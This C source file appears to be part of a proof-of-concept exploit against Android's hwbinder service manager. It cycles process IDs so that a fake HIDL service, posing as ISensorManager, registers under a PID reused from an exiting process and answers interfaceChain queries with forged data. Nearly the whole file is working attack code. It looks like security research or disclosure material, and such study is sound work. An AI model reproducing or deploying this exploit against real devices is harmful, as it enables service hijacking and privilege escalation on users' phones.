#include "common.h"
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/syscall.h>

#include "binder.h"

static struct binder_state *bs;

struct hidl_string {
  union {
    char *mBuffer;
    uint64_t pad0;
  };
  uint32_t mSize;  // NOT including the terminating '\0'.
  bool mOwnsBuffer; // if true then mBuffer is a mutable char *
};

struct hidl_vec {
  union {
    void *mBuffer;
    uint64_t pad0;
  };
  uint32_t mSize;
  bool mOwnsBuffer;
};

static int my_binder_handler(
    struct binder_state *bs, struct binder_transaction_data *txn,
    struct binder_io *msg, struct binder_io *reply) {
  static struct hidl_string iface_vec_buf[2] = {
    {
      .mBuffer = "android.frameworks.sensorservice@1.0::ISensorManager",
      .mSize = 52,
      .mOwnsBuffer = false
    },
    {
      .mBuffer = "android.hidl.base@1.0::IBase",
      .mSize = 28,
      .mOwnsBuffer = false
    }
  };
  static struct hidl_vec iface_vec = {
    .mBuffer = (void*)iface_vec_buf,
    .mSize = 2,
    .mOwnsBuffer = false
  };

  printf("got binder call\n");

  if (txn->code == 256067662) { // interfaceChain
    bio_put_uint32(reply, 0); // EX_NONE
    int vec_id;
    bio_put_buf(reply, &iface_vec, sizeof(iface_vec), &vec_id);
    int vec_data_id;
    bio_put_sub_buf(reply, vec_id, 0, iface_vec_buf, sizeof(iface_vec_buf), &vec_data_id);
    for (int i=0; i<sizeof(iface_vec_buf)/sizeof(iface_vec_buf[0]); i++) {
      struct hidl_string *str = iface_vec_buf + i;
      int string_data_id;
      bio_put_sub_buf(reply, vec_data_id, i * sizeof(iface_vec_buf[0]), str->mBuffer, str->mSize+1, &string_data_id);
    }
    return 0;
  } else if (txn->code == 257049926) { // getDebugInfo
    return -1; // TODO
  } else if (txn->code == 256398152) { // getHashChain
    return -1; // TODO
  } else {
    return -1;
  }
}

static pid_t cycle_target;

static pid_t pid_dec(pid_t pid) {
  pid--;
  if (pid <= 1) {
    pid = 32768;
  }
  return pid;
}

#define STACK_SIZE (8UL*1024*1024)

static void *create_stack(void) {
  char *stack = mmap(NULL, STACK_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
  if (stack == MAP_FAILED) err(1, "mmap stack");
  if (mprotect(stack, 0x1000, PROT_NONE)) err(1, "create stack guard");
  return stack + STACK_SIZE;
}

static int dummy_fn(void *dummy0) {
  _exit(0);
}

static int worker_fn(void *dummy0) {
  printf("entering child: %d\n", getpid());

  struct binder_io msg;
  struct binder_io reply;
  char data[0x1000];

  bio_init(&msg, data, sizeof(data), 4);
  bio_put_cstring(&msg, "android.hidl.manager@1.0::IServiceManager");

  int arg1_id = -1, arg1_data_id = -1;
  char *instance_name = "bogusbogusbogus";
  struct hidl_string arg1 = {
    .mBuffer = instance_name,
    .mSize = strlen(instance_name)
  };
  bio_put_buf(&msg, &arg1, sizeof(arg1), &arg1_id);
  bio_put_sub_buf(&msg, arg1_id, 0, arg1.mBuffer, arg1.mSize+1, &arg1_data_id);

  bio_put_obj(&msg, (void*)1);

  printf("pre-cycling...\n");
  printf("cycle target is %d\n", cycle_target);
  pid_t probe_pid = pid_dec(cycle_target);
  // friggin' undocumented SELinux error codes...
  while (syscall(__NR_tkill, probe_pid, 0) == 0 || errno == EPERM || errno == EACCES) {
    probe_pid = pid_dec(probe_pid);
  }
  printf("first unused preceding pid is %d (%d/%m)\n", probe_pid, errno);
  void *dummy_stack = create_stack();
  while (1) {
    int child = clone(dummy_fn, dummy_stack, CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_SIGHAND|CLONE_SYSVSEM|CLONE_VM|SIGCHLD, NULL);
    if (child == -1) err(1, "dummy clone");
    int status;
    if (waitpid(child, &status, 0) != child) err(1, "waitpid dummy_fn");
    if (child == probe_pid) break;
  }
  printf("PIDs should be cycled now...\n");

  eventfd_inc(SYNC_EFD_B);
  sleep(1);
  if (kill(cycle_target, SIGUSR1)) err(1, "SIGUSR1");

  printf("starting register transaction\n");
  if (binder_call(bs, &msg, &reply, 0, 2/*add*/, my_binder_handler)) errx(1, "binder_call");

  binder_done(bs, &msg, &reply);
  printf("REGISTRATION OVER\n");
  binder_loop(bs, my_binder_handler);
  return 0;
}

static void handle_sigusr1(int sig) {
  sleep(1);
  printf("owner of to-be-reused PID %d is quitting now\n", getpid());
  exit(0);
}

int register_main(void) {
  setbuf(stdout, NULL);

  {
    printf("%d forking master...\n", getpid());
    pid_t child = fork();
    if (child == -1) err(1, "fork");
    if (child != 0) {
      int status;
      if (waitpid(child, &status, 0) != child) err(1, "wait for child 1");
      eventfd_inc(SYNC_EFD_D);
      if (wait(&status) == -1) err(1, "wait for child 2");
      exit(0);
    }
  }

  bs = binder_open("/dev/hwbinder", 0x400000);
  if (bs == NULL) err(1, "binder_open");

  cycle_target = getpid();

  if (signal(SIGUSR1, handle_sigusr1)) err(1, "signal");

  {
    printf("%d forking...\n", getpid());
    int child = clone(worker_fn, create_stack(), CLONE_PARENT|CLONE_VM|SIGCHLD, NULL);
    if (child == -1) err(1, "worker clone");

    while (1) pause();
  }
}
